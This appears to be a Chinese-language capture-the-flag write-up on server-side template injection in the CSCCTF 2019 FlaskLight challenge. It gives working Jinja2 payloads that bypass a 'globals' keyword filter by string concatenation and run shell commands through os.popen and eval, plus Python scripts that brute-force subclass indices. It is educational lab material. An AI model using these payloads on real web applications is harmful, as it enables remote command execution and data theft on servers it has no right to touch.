[CSCCTF 2019 Qual]FlaskLight 1

目录

题目分析

看题目名称,可能是flask模板注入

查看页面源码,提示get方式传入search

text 复制代码
payload:?search={{7*7}}

返回49,确定是模板注入

模板注入相关知识

判断模板类型

继承关系


魔术方法

python 复制代码
__class__    # 查找当前类型的所属对象
__base__     # 沿着父子类的关系往上走一个
__mro__      # 查找当前对象继承的所有继承类
__subclasses__()    # 查找父类下所有的子类
__init__        # 查看类是否重载,重载指的是程序在运行时就加载好了这个模块到内存中,如果出现wrapper字眼,说明没有重载
__globals__        # 函数会以字典的形式返回当前对象的全部全局变量

常用注入模块

解法一:使用config

text 复制代码
payload:?search={{config}}

没ban环境变量,那么直接开始做题

text 复制代码
payload:?search={{config.__class__.__init__.__.globals__['os'].popen('whoami').read()}}

报错,应该是设置了过滤,经过逐个输入,确定过滤了global

过滤绕过

有许多绕过方法:

+拼接

~拼接

过滤器


寻找falg

我们使用+拼接即可绕过

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls').read()}}

看看flasklight

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen('ls /flasklight').read()}}

查看flag

text 复制代码
payload:?search={{config.__class__.__init__['__glo'+'bals__']['os'].popen(''cat /flasklight/coomme_geeeett_youur_flek'').read()}}

解法二:在已加载os模块的子类中直接调用os模块

python脚本查找加载os模块的子类

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'os.py' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

寻找flag的过程省略

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}

解法三:内建函数eval执行命令

python脚本寻找命令位置

python 复制代码
import requests
url = input('请输入url链接:')
for i in range(500):
    data = "?search={{().__class__.__base__.__subclasses__()["+str(i)+"].__init__['__glo'+'bals__']}}"
    url += data;
    try:
        response = requests.get(url)
        # print(response.text)
        if 'eval' in response.text:
            print(i)
            break
    except:
        pass

结果

解题

text 复制代码
payload:{{[].__class__.__base__.__subclasses__()[58].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}
相关推荐
databook1 小时前
Manim实现闪光轨迹特效
后端·python·动效
Juchecar2 小时前
解惑:NumPy 中 ndarray.ndim 到底是什么?
python
用户8356290780512 小时前
Python 删除 Excel 工作表中的空白行列
后端·python
Json_2 小时前
使用python-fastApi框架开发一个学校宿舍管理系统-前后端分离项目
后端·python·fastapi
数据智能老司机9 小时前
精通 Python 设计模式——分布式系统模式
python·设计模式·架构
数据智能老司机10 小时前
精通 Python 设计模式——并发与异步模式
python·设计模式·编程语言
数据智能老司机10 小时前
精通 Python 设计模式——测试模式
python·设计模式·架构
数据智能老司机10 小时前
精通 Python 设计模式——性能模式
python·设计模式·架构
c8i10 小时前
drf初步梳理
python·django
每日AI新事件10 小时前
python的异步函数
python